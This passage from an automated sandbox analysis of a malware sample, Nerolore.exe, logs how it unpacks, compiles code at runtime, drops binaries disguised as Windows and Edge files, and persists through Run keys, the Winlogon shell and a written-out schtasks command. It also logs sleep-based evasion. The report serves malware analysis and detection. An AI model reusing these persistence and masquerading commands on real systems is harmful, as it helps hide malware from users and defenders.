                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                              Source: Window Recorder Window detected: More than 3 window changes detected
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\54f8e4f5b93f5a
                              Source: C:\FontHost\ContainerAgentWinSession.exe Directory created: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exe Directory created: C:\Program Files\7-Zip\Lang\54f8e4f5b93f5a
                              Source: Nerolore.exe Static file information: File size 3514624 > 1048576
                              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093071531.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              Source: C:\Users\user\Desktop\Nerolore.exeUnpacked PE file: 0.2.Nerolore.exe.f00000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exe File created: C:\FontHost\__tmp_rar_sfx_access_check_3889468
                              Source: Nerolore.exe Static PE information: section name:
                              Source: Nerolore.exe Static PE information: section name:
                              Source: Nerolore.exe Static PE information: section name:
                              Source: Nerolore.exe Static PE information: section name:
                              Source: Nerolore.exe Static PE information: section name:
                              Source: Nerolore.exe Static PE information: section name:
                              Source: Nerolore.exe Static PE information: section name:
                              Source: Nerolore.exe Static PE information: section name: cheat
                              Source: Nerolore.exe Static PE information: section name: entropy: 7.996595675539958
                              Source: Nerolore.exe Static PE information: section name: entropy: 7.979931163938514
                              Source: Nerolore.exe Static PE information: section name: entropy: 7.481225763284233
                              Source: Nerolore.exe Static PE information: section name: entropy: 7.944529268421742
                              Source: Nerolore.exe Static PE information: section name: entropy: 7.852938121836332
                              Source: Nerolore.exe Static PE information: section name: cheat entropy: 7.987925279314385
                              Source: ContainerAgentWinSession.exe.0.dr Static PE information: section name: .text entropy: 7.5519356261605814
                              Source: NjWYKcLujkVoPzemFBeg.exe.5.dr Static PE information: section name: .text entropy: 7.5519356261605814
                              Source: OfficeClickToRun.exe.5.dr Static PE information: section name: .text entropy: 7.5519356261605814
                              Source: conhost.exe.5.dr Static PE information: section name: .text entropy: 7.5519356261605814
                              Source: NjWYKcLujkVoPzemFBeg.exe0.5.dr Static PE information: section name: .text entropy: 7.5519356261605814
                              Source: NjWYKcLujkVoPzemFBeg.exe1.5.dr Static PE information: section name: .text entropy: 7.5519356261605814

                              Persistence and Installation Behavior

                              Source: C:\FontHost\ContainerAgentWinSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File created: C:\Users\user\Desktop\LtUgLbtj.log
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File created: C:\Users\user\Desktop\xvosSKAI.log
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\ProgramData\dbg\conhost.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              Source: C:\Users\user\Desktop\Nerolore.exe File created: C:\FontHost\ContainerAgentWinSession.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Users\user\Desktop\vBGRGbPj.log
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Users\user\Desktop\XwBnJZqg.log
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File created: C:\Users\user\Desktop\goYNyXVt.log
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Users\user\Desktop\EeOHqUfQ.log
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File created: C:\Users\user\Desktop\GeIICmFp.log
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Users\user\Desktop\EmyZUDGW.log
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File created: C:\Users\user\Desktop\ddCMyFqs.log
                              Source: C:\FontHost\ContainerAgentWinSession.exe File created: C:\Users\user\Desktop\ONhXawky.log

                              Boot Survival

                              Source: C:\FontHost\ContainerAgentWinSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\FontHost\ContainerAgentWinSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession
                              Source: C:\FontHost\ContainerAgentWinSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBeg
                              Source: C:\FontHost\ContainerAgentWinSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                              Source: C:\FontHost\ContainerAgentWinSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                              Source: C:\FontHost\ContainerAgentWinSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                              Source: C:\FontHost\ContainerAgentWinSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                              Source: C:\FontHost\ContainerAgentWinSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSession
                              Source: C:\Users\user\Desktop\Nerolore.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\FontHost\ContainerAgentWinSession.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1340000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1B130000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 13D0000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1B00000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: B80000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1A8F0000 memory reserve | memory write watch
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 690000 memory reserve | memory write watch
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 1A5C0000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 2210000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 1A420000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1460000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1B130000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 830000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: 1A420000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1300000 memory reserve | memory write watch
                              Source: C:\ProgramData\dbg\conhost.exeMemory allocated: 1B140000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 740000 memory reserve | memory write watch
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeMemory allocated: 1A530000 memory reserve | memory write watch
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 600000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599874
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599765
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599578
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599437
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 599000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 598515
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 598405
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 300000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597625
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597500
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597375
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 597000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596859
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 3600000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596734
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596618
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596406
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596265
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 596048
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595906
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595701
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595578
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 595435
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594927
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594812
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594702
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594592
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594480
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594374
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594240
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 594124
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593954
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593828
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593688
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593562
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 593443
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592906
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592240
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 592109
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591977
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591874
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591765
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591628
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591500
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591390
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591281
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591171
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 591062
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590939
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590812
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590702
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590581
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590453
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590343
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590230
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 590094
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589524
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589369
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589259
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589156
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 589046
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588937
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588828
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588718
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588598
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588484
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588374
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 588265
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\Nerolore.exeWindow / User API: threadDelayed 844
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWindow / User API: threadDelayed 5123
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWindow / User API: threadDelayed 4532
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\LtUgLbtj.log
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\xvosSKAI.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\vBGRGbPj.log
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\XwBnJZqg.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\goYNyXVt.log
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\EeOHqUfQ.log
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\GeIICmFp.log
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\EmyZUDGW.log
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeDropped PE file which has not been started: C:\Users\user\Desktop\ddCMyFqs.log
                              Source: C:\FontHost\ContainerAgentWinSession.exeDropped PE file which has not been started: C:\Users\user\Desktop\ONhXawky.log
                              Source: C:\FontHost\ContainerAgentWinSession.exe TID: 2220Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\dbg\conhost.exe TID: 5360Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\dbg\conhost.exe TID: 5228Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 2300Thread sleep time: -30000s >= -30000s
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe TID: 7460Thread sleep time: -34126476536362649s >= -30000s
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe TID: 6208Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\FontHost\ContainerAgentWinSession.exe TID: 7252Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\FontHost\ContainerAgentWinSession.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\dbg\conhost.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe TID: 7416Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
